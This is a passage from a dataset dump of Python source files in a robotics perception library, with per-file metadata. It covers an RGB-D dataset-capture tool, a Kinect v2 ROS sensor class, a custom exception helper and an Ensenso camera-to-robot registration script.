\"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Natural Language :: English\",\n \"Topic :: Scientific/Engineering\",\n ],\n packages=[\"perception\"],\n install_requires=requirements,\n extras_require={\n \"docs\": [\"sphinx\", \"sphinxcontrib-napoleon\", \"sphinx_rtd_theme\"],\n \"ros\": [\"primesense\", \"rospkg\", \"catkin_pkg\", \"empy\"],\n },\n)\n"
},
{
"alpha_fraction": 0.5834683179855347,
"alphanum_fraction": 0.588650643825531,
"avg_line_length": 33.68988800048828,
"blob_id": "1e248336a1003dc2f269dae6d04e08b772af5ed8",
"content_id": "670d0fcd06921e6af51e9e6cbac7dcc30c39e545",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15437,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 445,
"path": "/tools/capture_dataset.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nScript to capture a set of test images.\nBe sure to register beforehand!!!\nAuthor: Jeff Mahler\n\"\"\"\nimport argparse\nimport logging\nimport os\n\nimport autolab_core.utils as utils\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pcl\nimport rosgraph.roslogging as rl\nimport rospy\nimport scipy.stats as ss\nimport trimesh\nfrom autolab_core import (\n Box,\n PointCloud,\n RigidTransform,\n TensorDataset,\n YamlConfig,\n)\nfrom autolab_core.constants import TEST_ID, TRAIN_ID\nfrom meshrender import MaterialProperties, Scene, SceneObject, VirtualCamera\nfrom visualization import Visualizer2D as vis2d\n\nfrom perception import RgbdSensorFactory\n\nGUI_PAUSE = 0.5\n\n\ndef preprocess_images(\n raw_color_im,\n raw_depth_im,\n camera_intr,\n T_camera_world,\n workspace_box,\n workspace_im,\n image_proc_config,\n):\n \"\"\"Preprocess a set of color and depth images.\"\"\"\n # read params\n inpaint_rescale_factor = image_proc_config[\"inpaint_rescale_factor\"]\n cluster = image_proc_config[\"cluster\"]\n cluster_tolerance = image_proc_config[\"cluster_tolerance\"]\n min_cluster_size = image_proc_config[\"min_cluster_size\"]\n max_cluster_size = image_proc_config[\"max_cluster_size\"]\n\n # deproject into 3D world coordinates\n point_cloud_cam = camera_intr.deproject(raw_depth_im)\n point_cloud_cam.remove_zero_points()\n point_cloud_world = T_camera_world * point_cloud_cam\n\n # compute the segmask for points above the box\n seg_point_cloud_world, _ = point_cloud_world.box_mask(workspace_box)\n seg_point_cloud_cam = T_camera_world.inverse() * seg_point_cloud_world\n depth_im_seg = camera_intr.project_to_image(seg_point_cloud_cam)\n\n # mask out objects in the known workspace\n env_pixels = depth_im_seg.pixels_farther_than(workspace_im)\n depth_im_seg._data[env_pixels[:, 0], env_pixels[:, 1]] = 0\n\n # REMOVE NOISE\n # clip low points\n low_indices = np.where(\n point_cloud_world.data[2, :] < workspace_box.min_pt[2]\n )[0]\n point_cloud_world.data[2, low_indices] = workspace_box.min_pt[2]\n\n # clip high points\n high_indices = np.where(\n point_cloud_world.data[2, :] > workspace_box.max_pt[2]\n )[0]\n point_cloud_world.data[2, high_indices] = workspace_box.max_pt[2]\n\n # segment out the region in the workspace (including the table)\n workspace_point_cloud_world, valid_indices = point_cloud_world.box_mask(\n workspace_box\n )\n invalid_indices = np.setdiff1d(\n np.arange(point_cloud_world.num_points), valid_indices\n )\n\n if cluster:\n # create new cloud\n pcl_cloud = pcl.PointCloud(\n workspace_point_cloud_world.data.T.astype(np.float32)\n )\n tree = pcl_cloud.make_kdtree()\n\n # find large clusters (likely to be real objects instead of noise)\n ec = pcl_cloud.make_EuclideanClusterExtraction()\n ec.set_ClusterTolerance(cluster_tolerance)\n ec.set_MinClusterSize(min_cluster_size)\n ec.set_MaxClusterSize(max_cluster_size)\n ec.set_SearchMethod(tree)\n cluster_indices = ec.Extract()\n\n # read out all points in large clusters\n filtered_points = np.zeros([3, workspace_point_cloud_world.num_points])\n cur_i = 0\n for j, indices in enumerate(cluster_indices):\n num_points = len(indices)\n points = np.zeros([3, num_points])\n\n for i, index in enumerate(indices):\n points[0, i] = pcl_cloud[index][0]\n points[1, i] = pcl_cloud[index][1]\n points[2, i] = pcl_cloud[index][2]\n\n filtered_points[:, cur_i : cur_i + num_points] = points.copy()\n cur_i = cur_i + num_points\n\n # reconstruct the point cloud\n all_points = np.c_[\n filtered_points[:, :cur_i],\n 
point_cloud_world.data[:, invalid_indices],\n ]\n else:\n all_points = point_cloud_world.data\n filtered_point_cloud_world = PointCloud(all_points, frame=\"world\")\n\n # compute the filtered depth image\n filtered_point_cloud_cam = (\n T_camera_world.inverse() * filtered_point_cloud_world\n )\n depth_im = camera_intr.project_to_image(filtered_point_cloud_cam)\n\n # form segmask\n segmask = depth_im_seg.to_binary()\n valid_px_segmask = depth_im.invalid_pixel_mask().inverse()\n segmask = segmask.mask_binary(valid_px_segmask)\n\n # inpaint\n color_im = raw_color_im.inpaint(rescale_factor=inpaint_rescale_factor)\n depth_im = depth_im.inpaint(rescale_factor=inpaint_rescale_factor)\n return color_im, depth_im, segmask\n\n\nif __name__ == \"__main__\":\n # set up logger\n logging.getLogger().setLevel(logging.INFO)\n rospy.init_node(\"capture_dataset\", anonymous=True)\n logging.getLogger().addHandler(rl.RosStreamHandler())\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Capture a dataset of RGB-D images from a set of sensors\"\n )\n parser.add_argument(\n \"output_dir\", type=str, help=\"directory to save output\"\n )\n parser.add_argument(\n \"num_images\", type=int, help=\"number of images to capture\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=None,\n help=\"path to configuration file to use\",\n )\n args = parser.parse_args()\n output_dir = args.output_dir\n num_images = args.num_images\n config_filename = args.config_filename\n\n # make output directory\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n\n # fix config\n if config_filename is None:\n config_filename = os.path.join(\n os.path.dirname(os.path.realpath(__file__)),\n \"..\",\n \"cfg/tools/capture_dataset.yaml\",\n )\n\n # turn relative paths absolute\n if not os.path.isabs(config_filename):\n config_filename = os.path.join(os.getcwd(), config_filename)\n\n # read config\n config = YamlConfig(config_filename)\n dataset_config = config[\"dataset\"]\n sensor_configs = config[\"sensors\"]\n workspace_config = config[\"workspace\"]\n image_proc_config = config[\"image_proc\"]\n\n # read objects\n train_pct = config[\"train_pct\"]\n objects = config[\"objects\"]\n num_objects = len(objects)\n num_train = int(np.ceil(train_pct * num_objects))\n num_test = num_objects - num_train\n all_indices = np.arange(num_objects)\n np.random.shuffle(all_indices)\n train_indices = all_indices[:num_train]\n test_indices = all_indices[num_train:]\n\n num_train_images = int(np.ceil(train_pct * num_images))\n all_image_indices = np.arange(num_images)\n np.random.shuffle(all_image_indices)\n train_image_indices = all_image_indices[:num_train_images]\n\n # set random variable for the number of objects\n mean_num_objects = config[\"mean_num_objects\"]\n min_num_objects = config[\"min_num_objects\"]\n max_num_objects = config[\"max_num_objects\"]\n num_objs_rv = ss.poisson(mean_num_objects - 1)\n im_rescale_factor = image_proc_config[\"im_rescale_factor\"]\n\n save_raw = config[\"save_raw\"]\n vis = config[\"vis\"]\n\n # open gui\n gui = plt.figure(0, figsize=(8, 8))\n plt.ion()\n plt.title(\"INITIALIZING\")\n plt.imshow(np.zeros([100, 100]), cmap=plt.cm.gray_r)\n plt.axis(\"off\")\n plt.draw()\n plt.pause(GUI_PAUSE)\n\n # read workspace bounds\n workspace_box = Box(\n np.array(workspace_config[\"min_pt\"]),\n np.array(workspace_config[\"max_pt\"]),\n frame=\"world\",\n )\n\n # read workspace objects\n workspace_objects = {}\n for obj_key, obj_config in 
workspace_config[\"objects\"].iteritems():\n mesh_filename = obj_config[\"mesh_filename\"]\n pose_filename = obj_config[\"pose_filename\"]\n obj_mesh = trimesh.load_mesh(mesh_filename)\n obj_pose = RigidTransform.load(pose_filename)\n obj_mat_props = MaterialProperties(smooth=True, wireframe=False)\n scene_obj = SceneObject(obj_mesh, obj_pose, obj_mat_props)\n workspace_objects[obj_key] = scene_obj\n\n # setup each sensor\n datasets = {}\n sensors = {}\n sensor_poses = {}\n camera_intrs = {}\n workspace_ims = {}\n for sensor_name, sensor_config in sensor_configs.iteritems():\n # read params\n sensor_type = sensor_config[\"type\"]\n sensor_frame = sensor_config[\"frame\"]\n\n # read camera calib\n tf_filename = \"%s_to_world.tf\" % (sensor_frame)\n T_camera_world = RigidTransform.load(\n os.path.join(sensor_config[\"calib_dir\"], sensor_frame, tf_filename)\n )\n sensor_poses[sensor_name] = T_camera_world\n\n # setup sensor\n sensor = RgbdSensorFactory.sensor(sensor_type, sensor_config)\n sensors[sensor_name] = sensor\n\n # start the sensor\n sensor.start()\n camera_intr = sensor.ir_intrinsics\n camera_intr = camera_intr.resize(im_rescale_factor)\n camera_intrs[sensor_name] = camera_intr\n\n # render image of static workspace\n scene = Scene()\n camera = VirtualCamera(camera_intr, T_camera_world)\n scene.camera = camera\n for obj_key, scene_obj in workspace_objects.iteritems():\n scene.add_object(obj_key, scene_obj)\n workspace_ims[sensor_name] = scene.wrapped_render([\"depth\"])[0]\n\n # fix dataset config\n dataset_config[\"fields\"][\"raw_color_ims\"][\n \"height\"\n ] = camera_intr.height\n dataset_config[\"fields\"][\"raw_color_ims\"][\"width\"] = camera_intr.width\n dataset_config[\"fields\"][\"raw_depth_ims\"][\n \"height\"\n ] = camera_intr.height\n dataset_config[\"fields\"][\"raw_depth_ims\"][\"width\"] = camera_intr.width\n dataset_config[\"fields\"][\"color_ims\"][\"height\"] = camera_intr.height\n dataset_config[\"fields\"][\"color_ims\"][\"width\"] = camera_intr.width\n dataset_config[\"fields\"][\"depth_ims\"][\"height\"] = camera_intr.height\n dataset_config[\"fields\"][\"depth_ims\"][\"width\"] = camera_intr.width\n dataset_config[\"fields\"][\"segmasks\"][\"height\"] = camera_intr.height\n dataset_config[\"fields\"][\"segmasks\"][\"width\"] = camera_intr.width\n\n # open dataset\n sensor_dataset_filename = os.path.join(output_dir, sensor_name)\n datasets[sensor_name] = TensorDataset(\n sensor_dataset_filename, dataset_config\n )\n\n # save raw\n if save_raw:\n sensor_dir = os.path.join(output_dir, sensor_name)\n raw_dir = os.path.join(sensor_dir, \"raw\")\n if not os.path.exists(raw_dir):\n os.mkdir(raw_dir)\n\n camera_intr_filename = os.path.join(raw_dir, \"camera_intr.intr\")\n camera_intr.save(camera_intr_filename)\n camera_pose_filename = os.path.join(raw_dir, \"T_camera_world.tf\")\n T_camera_world.save(camera_pose_filename)\n\n # collect K images\n for k in range(num_images):\n logging.info(\"Test case %d of %d\" % (k, num_images))\n\n # set test case\n train = 0\n split = TEST_ID\n if k in train_image_indices:\n train = 1\n split = TRAIN_ID\n if train:\n num_objects = min(\n max(num_objs_rv.rvs(size=1)[0] + 1, min_num_objects), num_train\n )\n obj_names = [\n objects[i]\n for i in np.random.choice(\n train_indices, size=num_objects, replace=False\n )\n ]\n else:\n num_objects = min(\n max(num_objs_rv.rvs(size=1)[0] + 1, min_num_objects), num_test\n )\n obj_names = [\n objects[i]\n for i in np.random.choice(\n test_indices, size=num_objects, replace=False\n )\n ]\n\n 
# get human consent\n message = \"Please place %d objects:\\n\" % (num_objects)\n for name in obj_names:\n message += \"\\t{}\\n\".format(name)\n message += \"Hit ENTER when finished.\"\n utils.keyboard_input(message=message)\n\n # capture\n for sensor_name, sensor in sensors.iteritems():\n logging.info(\"Capturing images from sensor %s\" % (sensor_name))\n\n # read pose and intrinsics\n sensor_pose = sensor_poses[sensor_name]\n camera_intr = camera_intrs[sensor_name]\n workspace_im = workspace_ims[sensor_name]\n dataset = datasets[sensor_name]\n T_camera_world = sensor_pose\n datapoint = dataset.datapoint_template\n\n # read raw images\n raw_color_im, raw_depth_im, _ = sensor.frames()\n\n # resize\n raw_color_im = raw_color_im.resize(im_rescale_factor)\n raw_depth_im = raw_depth_im.resize(\n im_rescale_factor, interp=\"nearest\"\n )\n\n # preprocess\n color_im, depth_im, segmask = preprocess_images(\n raw_color_im,\n raw_depth_im,\n camera_intr,\n T_camera_world,\n workspace_box,\n workspace_im,\n image_proc_config,\n )\n\n # visualize\n if vis:\n gui = plt.figure(0)\n plt.clf()\n vis2d.subplot(2, 3, 1)\n vis2d.imshow(raw_color_im)\n vis2d.title(\"RAW COLOR\")\n vis2d.subplot(2, 3, 2)\n vis2d.imshow(raw_depth_im)\n vis2d.title(\"RAW DEPTH\")\n vis2d.subplot(2, 3, 4)\n vis2d.imshow(color_im)\n vis2d.title(\"COLOR\")\n vis2d.subplot(2, 3, 5)\n vis2d.imshow(depth_im)\n vis2d.title(\"DEPTH\")\n vis2d.subplot(2, 3, 6)\n vis2d.imshow(segmask)\n vis2d.title(\"SEGMASK\")\n plt.draw()\n plt.pause(GUI_PAUSE)\n\n # save data\n datapoint[\"split\"] = split\n datapoint[\"camera_intrs\"] = camera_intr.vec\n datapoint[\"camera_poses\"] = sensor_pose.vec\n datapoint[\"raw_color_ims\"] = raw_color_im.raw_data\n datapoint[\"raw_depth_ims\"] = raw_depth_im.raw_data\n datapoint[\"color_ims\"] = color_im.raw_data\n datapoint[\"depth_ims\"] = depth_im.raw_data\n datapoint[\"segmasks\"] = segmask.raw_data\n dataset.add(datapoint)\n\n # save raw data\n if save_raw:\n sensor_dir = os.path.join(output_dir, sensor_name)\n raw_dir = os.path.join(sensor_dir, \"raw\")\n\n raw_color_im_filename = os.path.join(\n raw_dir, \"raw_color_%d.png\" % (k)\n )\n raw_color_im.save(raw_color_im_filename)\n color_im_filename = os.path.join(raw_dir, \"color_%d.png\" % (k))\n color_im.save(color_im_filename)\n\n raw_depth_im_filename = os.path.join(\n raw_dir, \"raw_depth_%d.npy\" % (k)\n )\n raw_depth_im.save(raw_depth_im_filename)\n depth_im_filename = os.path.join(raw_dir, \"depth_%d.npy\" % (k))\n depth_im.save(depth_im_filename)\n\n segmask_filename = os.path.join(\n raw_dir, \"segmask_%d.png\" % (k)\n )\n segmask.save(segmask_filename)\n\n # stop all sensors\n for sensor_name, sensor in sensors.iteritems():\n datasets[sensor_name].flush()\n sensor.stop()\n"
},
{
"alpha_fraction": 0.6272727251052856,
"alphanum_fraction": 0.6272727251052856,
"avg_line_length": 25.399999618530273,
"blob_id": "2773db231426d5162354a2f03b457000fd57d1dd",
"content_id": "8247b4767652284b6603918a7b3656c96ab7f39c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 660,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 25,
"path": "/perception/exceptions.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "def closure(exc):\n \"\"\"\n Taken from Trimesh:\n https://github.com/mikedh/trimesh/blob/master/trimesh/exceptions.py.\n Return a function which will accept any arguments\n but raise the exception when called.\n Parameters\n ------------\n exc : Exception\n Will be raised later\n Returns\n -------------\n failed : function\n When called will raise `exc`\n \"\"\"\n # scoping will save exception\n def failed(*args, **kwargs):\n raise exc\n\n return failed\n\n\nclass SensorUnresponsiveException(Exception):\n def __init__(self, *args, **kwargs):\n super(SensorUnresponsiveException, self).__init__(*args, **kwargs)\n"
},
{
"alpha_fraction": 0.5694703459739685,
"alphanum_fraction": 0.5737290382385254,
"avg_line_length": 29.669387817382812,
"blob_id": "0b9a2634e5ac8d722050e1e8a506c8cce9e1ec7c",
"content_id": "1c57d189f2d7e3dc943d1c567cf40f3c85958cd8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7514,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 245,
"path": "/perception/kinect2_ros_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nClass for interfacing with the Primesense RGBD sensor\nAuthor: Jeff Mahler\n\"\"\"\nimport logging\nimport time\n\nimport numpy as np\nimport rospy\nimport sensor_msgs.msg\nfrom autolab_core import CameraIntrinsics, ColorImage, DepthImage, Image\nfrom autolab_core.constants import MM_TO_METERS\nfrom cv_bridge import CvBridge, CvBridgeError\n\nfrom .camera_sensor import CameraSensor\n\n\nclass Kinect2BridgedQuality:\n \"\"\"Kinect quality for bridged mode\"\"\"\n\n HD = \"hd\"\n QUARTER_HD = \"qhd\"\n SD = \"sd\"\n\n\nclass KinectSensorBridged(CameraSensor):\n \"\"\"Class for interacting with a Kinect v2 RGBD sensor through the kinect\n bridge https://github.com/code-iai/iai_kinect2. This is preferrable for\n visualization and debug because the kinect bridge will continuously\n publish image and point cloud info.\n \"\"\"\n\n def __init__(\n self,\n quality=Kinect2BridgedQuality.HD,\n frame=\"kinect2_rgb_optical_frame\",\n ):\n \"\"\"Initialize a Kinect v2 sensor which connects to the\n iai_kinect2 bridge\n ----------\n quality : :obj:`str`\n The quality (HD, Quarter-HD, SD) of the image data that\n should be subscribed to\n frame : :obj:`str`\n The name of the frame of reference in which the sensor resides.\n If None, this will be set to 'kinect2_rgb_optical_frame'\n \"\"\"\n # set member vars\n self._frame = frame\n\n self.topic_image_color = \"/kinect2/%s/image_color_rect\" % (quality)\n self.topic_image_depth = \"/kinect2/%s/image_depth_rect\" % (quality)\n self.topic_info_camera = \"/kinect2/%s/camera_info\" % (quality)\n\n self._initialized = False\n self._format = None\n self._camera_intr = None\n self._cur_depth_im = None\n self._running = False\n self._bridge = CvBridge()\n\n def __del__(self):\n \"\"\"Automatically stop the sensor for safety.\"\"\"\n if self.is_running:\n self.stop()\n\n def _set_camera_properties(self, msg):\n \"\"\"Set the camera intrinsics from an info msg.\"\"\"\n focal_x = msg.K[0]\n focal_y = msg.K[4]\n center_x = msg.K[2]\n center_y = msg.K[5]\n im_height = msg.height\n im_width = msg.width\n self._camera_intr = CameraIntrinsics(\n self._frame,\n focal_x,\n focal_y,\n center_x,\n center_y,\n height=im_height,\n width=im_width,\n )\n\n def _process_image_msg(self, msg):\n \"\"\"Process an image message and return a numpy array with the image data\n Returns\n -------\n :obj:`numpy.ndarray` containing the image in the image message\n\n Raises\n ------\n CvBridgeError\n If the bridge is not able to convert the image\n \"\"\"\n encoding = msg.encoding\n try:\n image = self._bridge.imgmsg_to_cv2(msg, encoding)\n except CvBridgeError as e:\n rospy.logerr(e)\n return image\n\n def _color_image_callback(self, image_msg):\n \"\"\"subscribe to image topic and keep it up to date\"\"\"\n color_arr = self._process_image_msg(image_msg)\n self._cur_color_im = ColorImage(color_arr[:, :, ::-1], self._frame)\n\n def _depth_image_callback(self, image_msg):\n \"\"\"subscribe to depth image topic and keep it up to date\"\"\"\n encoding = image_msg.encoding\n try:\n depth_arr = self._bridge.imgmsg_to_cv2(image_msg, encoding)\n except CvBridgeError as e:\n rospy.logerr(e)\n depth = np.array(depth_arr * MM_TO_METERS, np.float32)\n self._cur_depth_im = DepthImage(depth, self._frame)\n\n def _camera_info_callback(self, msg):\n \"\"\"Callback for reading camera info.\"\"\"\n self._camera_info_sub.unregister()\n self._set_camera_properties(msg)\n\n @property\n def ir_intrinsics(self):\n \"\"\":obj:`CameraIntrinsics` : IR camera intrinsics of Kinect.\"\"\"\n return 
self._camera_intr\n\n    @property\n    def is_running(self):\n        \"\"\"bool : True if the stream is running, or false otherwise.\"\"\"\n        return self._running\n\n    @property\n    def frame(self):\n        \"\"\":obj:\`str\` : The reference frame of the sensor.\"\"\"\n        return self._frame\n\n    def start(self):\n        \"\"\"Start the sensor\"\"\"\n        # initialize subscribers\n        self._image_sub = rospy.Subscriber(\n            self.topic_image_color,\n            sensor_msgs.msg.Image,\n            self._color_image_callback,\n        )\n        self._depth_sub = rospy.Subscriber(\n            self.topic_image_depth,\n            sensor_msgs.msg.Image,\n            self._depth_image_callback,\n        )\n        self._camera_info_sub = rospy.Subscriber(\n            self.topic_info_camera,\n            sensor_msgs.msg.CameraInfo,\n            self._camera_info_callback,\n        )\n\n        timeout = 10\n        try:\n            rospy.loginfo(\"waiting to receive a message from the Kinect\")\n            rospy.wait_for_message(\n                self.topic_image_color, sensor_msgs.msg.Image, timeout=timeout\n            )\n            rospy.wait_for_message(\n                self.topic_image_depth, sensor_msgs.msg.Image, timeout=timeout\n            )\n            rospy.wait_for_message(\n                self.topic_info_camera,\n                sensor_msgs.msg.CameraInfo,\n                timeout=timeout,\n            )\n        except rospy.ROSException as e:\n            print(\"KINECT NOT FOUND\")\n            rospy.logerr(\"Kinect topic not found, Kinect not started\")\n            rospy.logerr(e)\n\n        while self._camera_intr is None:\n            time.sleep(0.1)\n\n        self._running = True\n\n    def stop(self):\n        \"\"\"Stop the sensor\"\"\"\n        # check that everything is running\n        if not self._running:\n            logging.warning(\"Kinect not running. Aborting stop\")\n            return False\n\n        # stop subs\n        self._image_sub.unregister()\n        self._depth_sub.unregister()\n        self._camera_info_sub.unregister()\n\n        self._running = False\n        return True\n\n    def frames(self):\n        \"\"\"Retrieve a new frame from the Kinect and convert it to a ColorImage\n        and a DepthImage\n\n        Returns\n        -------\n        :obj:\`tuple\` of :obj:\`ColorImage\`, :obj:\`DepthImage\`\n            The ColorImage and DepthImage of the current frame.\n\n        Raises\n        ------\n        RuntimeError\n            If the Kinect stream is not running.\n        \"\"\"\n        # wait for a new image\n        while self._cur_depth_im is None or self._cur_color_im is None:\n            time.sleep(0.01)\n\n        # read next image\n        depth_im = self._cur_depth_im\n        color_im = self._cur_color_im\n\n        self._cur_color_im = None\n        self._cur_depth_im = None\n\n        # TODO add ir image\n        return color_im, depth_im\n\n    def median_depth_img(self, num_img=1, fill_depth=0.0):\n        \"\"\"Collect a series of depth images and return the median of the set.\n\n        Parameters\n        ----------\n        num_img : int\n            The number of consecutive frames to process.\n\n        Returns\n        -------\n        :obj:\`DepthImage\`\n            The median DepthImage collected from the frames.\n        \"\"\"\n        depths = []\n\n        for _ in range(num_img):\n            _, depth = self.frames()\n            depths.append(depth)\n\n        median_depth = Image.median_images(depths)\n        median_depth.data[median_depth.data == 0.0] = fill_depth\n        return median_depth\n"
},
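An aside on the record above: `_set_camera_properties` pulls the pinhole parameters straight out of the flattened, row-major 3x3 `K` matrix of a ROS `CameraInfo` message (fx at index 0, fy at 4, cx at 2, cy at 5). A minimal standalone sketch of that index arithmetic, with an invented `K` for illustration:

import numpy as np

# Hypothetical flattened 3x3 intrinsics matrix (row-major), as carried in
# sensor_msgs/CameraInfo.K; the numbers here are invented for illustration.
K = np.array([1081.4, 0.0, 959.5, 0.0, 1081.4, 539.5, 0.0, 0.0, 1.0])

focal_x, focal_y = K[0], K[4]    # fx, fy on the diagonal
center_x, center_y = K[2], K[5]  # cx, cy in the last column
print(focal_x, focal_y, center_x, center_y)  # 1081.4 1081.4 959.5 539.5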
{
"alpha_fraction": 0.603352963924408,
"alphanum_fraction": 0.6076332926750183,
"avg_line_length": 30.149999618530273,
"blob_id": "efe517b839f0e60233b9de55061e23b67111807f",
"content_id": "b6737aea8173e78b07a9456fac49ebafdec7a705",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5607,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 180,
"path": "/tools/register_ensenso.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "\"\"\"\nRegister Ensenso to the robot\nAuthor: Jeff Mahler\n\"\"\"\nimport argparse\nimport logging\nimport os\nimport time\n\nimport numpy as np\nimport rospy\nfrom autolab_core import Point, RigidTransform, YamlConfig, keyboard_input\nfrom ensenso.srv import CollectPattern, EstimatePatternPose\nfrom yumipy import YuMiConstants as YMC\nfrom yumipy import YuMiRobot\n\nfrom perception import RgbdSensorFactory\n\n\ndef register_ensenso(config):\n # set parameters\n average = True\n add_to_buffer = True\n clear_buffer = False\n decode = True\n grid_spacing = -1\n\n # read parameters\n num_patterns = config[\"num_patterns\"]\n max_tries = config[\"max_tries\"]\n\n # load tf pattern to world\n T_pattern_world = RigidTransform.load(config[\"pattern_tf\"])\n\n # initialize sensor\n sensor_frame = config[\"sensor_frame\"]\n sensor_config = {\"frame\": sensor_frame}\n logging.info(\"Creating sensor\")\n sensor = RgbdSensorFactory.sensor(\"ensenso\", sensor_config)\n\n # initialize node\n rospy.init_node(\"register_ensenso\", anonymous=True)\n rospy.wait_for_service(\"/%s/collect_pattern\" % (sensor_frame))\n rospy.wait_for_service(\"/%s/estimate_pattern_pose\" % (sensor_frame))\n\n # start sensor\n print(\"Starting sensor\")\n sensor.start()\n time.sleep(1)\n print(\"Sensor initialized\")\n\n # perform registration\n try:\n print(\"Collecting patterns\")\n num_detected = 0\n i = 0\n while num_detected < num_patterns and i < max_tries:\n collect_pattern = rospy.ServiceProxy(\n \"/%s/collect_pattern\" % (sensor_frame), CollectPattern\n )\n resp = collect_pattern(\n add_to_buffer, clear_buffer, decode, grid_spacing\n )\n if resp.success:\n print(\"Detected pattern %d\" % (num_detected))\n num_detected += 1\n i += 1\n\n if i == max_tries:\n raise ValueError(\"Failed to detect calibration pattern!\")\n\n print(\"Estimating pattern pose\")\n estimate_pattern_pose = rospy.ServiceProxy(\n \"/%s/estimate_pattern_pose\" % (sensor_frame), EstimatePatternPose\n )\n resp = estimate_pattern_pose(average)\n\n q_pattern_camera = np.array(\n [\n resp.pose.orientation.w,\n resp.pose.orientation.x,\n resp.pose.orientation.y,\n resp.pose.orientation.z,\n ]\n )\n t_pattern_camera = np.array(\n [resp.pose.position.x, resp.pose.position.y, resp.pose.position.z]\n )\n T_pattern_camera = RigidTransform(\n rotation=q_pattern_camera,\n translation=t_pattern_camera,\n from_frame=\"pattern\",\n to_frame=sensor_frame,\n )\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\" % (str(e)))\n\n # compute final transformation\n T_camera_world = T_pattern_world * T_pattern_camera.inverse()\n\n # save final transformation\n output_dir = os.path.join(config[\"calib_dir\"], sensor_frame)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n pose_filename = os.path.join(output_dir, \"%s_to_world.tf\" % (sensor_frame))\n T_camera_world.save(pose_filename)\n intr_filename = os.path.join(output_dir, \"%s.intr\" % (sensor_frame))\n sensor.ir_intrinsics.save(intr_filename)\n\n # log final transformation\n print(\"Final Result for sensor %s\" % (sensor_frame))\n print(\"Rotation: \")\n print(T_camera_world.rotation)\n print(\"Quaternion: \")\n print(T_camera_world.quaternion)\n print(\"Translation: \")\n print(T_camera_world.translation)\n\n # stop sensor\n sensor.stop()\n\n # move robot to calib pattern center\n if config[\"use_robot\"]:\n # create robot pose relative to target point\n target_pt_camera = Point(T_pattern_camera.translation, sensor_frame)\n target_pt_world = T_camera_world * 
target_pt_camera\n R_gripper_world = np.array([[1.0, 0, 0], [0, -1.0, 0], [0, 0, -1.0]])\n t_gripper_world = np.array(\n [\n target_pt_world.x + config[\"gripper_offset_x\"],\n target_pt_world.y + config[\"gripper_offset_y\"],\n target_pt_world.z + config[\"gripper_offset_z\"],\n ]\n )\n T_gripper_world = RigidTransform(\n rotation=R_gripper_world,\n translation=t_gripper_world,\n from_frame=\"gripper\",\n to_frame=\"world\",\n )\n\n # move robot to pose\n y = YuMiRobot(tcp=YMC.TCP_SUCTION_STIFF)\n y.reset_home()\n time.sleep(1)\n\n T_lift = RigidTransform(\n translation=(0, 0, 0.05), from_frame=\"world\", to_frame=\"world\"\n )\n T_gripper_world_lift = T_lift * T_gripper_world\n\n y.right.goto_pose(T_gripper_world_lift)\n y.right.goto_pose(T_gripper_world)\n\n # wait for human measurement\n keyboard_input(\"Take measurement. Hit [ENTER] when done\")\n y.right.goto_pose(T_gripper_world_lift)\n y.reset_home()\n y.stop()\n\n\nif __name__ == \"__main__\":\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Register a camera to a robot\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/register_ensenso.yaml\",\n help=\"filename of a YAML configuration for registration\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n config = YamlConfig(config_filename)\n\n # perform registration\n register_ensenso(config)\n"
},
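The registration in the script above boils down to one frame-chaining identity: given the calibration pattern's pose in both the world and camera frames, T_camera_world = T_pattern_world * T_pattern_camera^-1. A toy sketch of that chain with invented, identity-rotation poses, using the same `autolab_core.RigidTransform` calls as the script:

import numpy as np
from autolab_core import RigidTransform

# Invented poses purely for illustration (rotations default to identity).
T_pattern_world = RigidTransform(
    translation=np.array([0.4, 0.0, 0.0]), from_frame="pattern", to_frame="world"
)
T_pattern_camera = RigidTransform(
    translation=np.array([0.0, 0.0, 0.7]), from_frame="pattern", to_frame="ensenso"
)

# Chain the frames exactly as register_ensenso does.
T_camera_world = T_pattern_world * T_pattern_camera.inverse()
print(T_camera_world.from_frame, "->", T_camera_world.to_frame)  # ensenso -> world
print(T_camera_world.translation)  # roughly [0.4, 0.0, -0.7]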
{
"alpha_fraction": 0.5914249420166016,
"alphanum_fraction": 0.5963289737701416,
"avg_line_length": 33.6456298828125,
"blob_id": "ba179c9e926eaa23fcc534edf27932b261b13577",
"content_id": "98e1725199dfc6931376417ffe504fd22532a18c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7137,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 206,
"path": "/perception/primesense_ros_sensor.py",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
